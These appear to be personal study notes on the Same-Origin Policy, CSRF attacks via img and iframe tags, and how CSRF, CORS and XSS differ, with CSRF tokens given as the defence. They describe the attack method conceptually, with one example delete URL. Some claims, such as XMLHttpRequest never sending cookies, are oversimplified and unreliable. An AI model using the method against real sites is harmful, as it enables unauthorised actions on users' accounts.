# SOP and Its Quirks

### **TLDR;** 

1. SOP prevents responses of different origin from being displayed; When performing a cross-site-request-forgery with AJAX, cookies are not sent along with the request. -> So, the usage of  **\<XMLHTTPRequest >** for example is not possible for an attack.
2. If the cross origin website has URLs that are dangerous just by sending a GET request, this can be abused using \<img> or \<iframe> tags to embedded the exploitable URL, as cookies are sent along with this.  &#x20;

**Problems:**&#x20;

XMLHttpRequest().send() does not include cookies with it, making it impossible for a Cross Origin Attack.&#x20;

\<img> or \<iframe> **does** include cookies, but no private response data is returned.

**Solution and Exploit:**

Just look for URLs that can be exploited just by requesting it, such as /profile/admin/1/delete.&#x20;

This method allows GET and POST requests as seen below.

![GET request with Iframe.](https://1016642613-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MLICeMp-ugVlUqxbbIS%2F-MOnK8_fpykEupOHSLCT%2F-MOnMqTHp0Q6oK2yG3GX%2Fimage.png?alt=media\&token=7071aefb-d16d-4960-9eb4-71eec6362ba2)

\*Note: Post request made this way \<inside of a form> will always send data as urlencoded-data

**Prevention:**&#x20;

Usage of CSRF token.&#x20;

## CSRF, CORS, XSS Differences

-> CORS can get data & most of the time wont have CSRF token (wants it to be accessed cross site) -> CSRF can execute functions (and get no data) from different site if not protected by CSRF tokens -> XSS can execute function and get data so CSRF token doesnt matter -> BUT if csrf token present, reflected xss will not work.

* CORS will only be able to get response from allowed directories/URLS with \`Access-Control-Allowed-Origin:\<Requesting Site> & Access-Control-Allow-Credentials\` header
* XSS only needs 1 hole, and can act as the user whole site and get response from all URL as it will be from same site
* CSRF needs every function to be vulnerable/missing CSRF tokens

### **Reference;**

If this doesn't make sense to you, just go watch LiveOverflow's video below; I took these notes out mostly from this video anyway :)&#x20;

**Live OverFlow \[** [CSRF Introduction and what is the Same-Origin Policy? - web 0x04 ](https://www.youtube.com/watch?v=KaEj_qZgiKY)**]**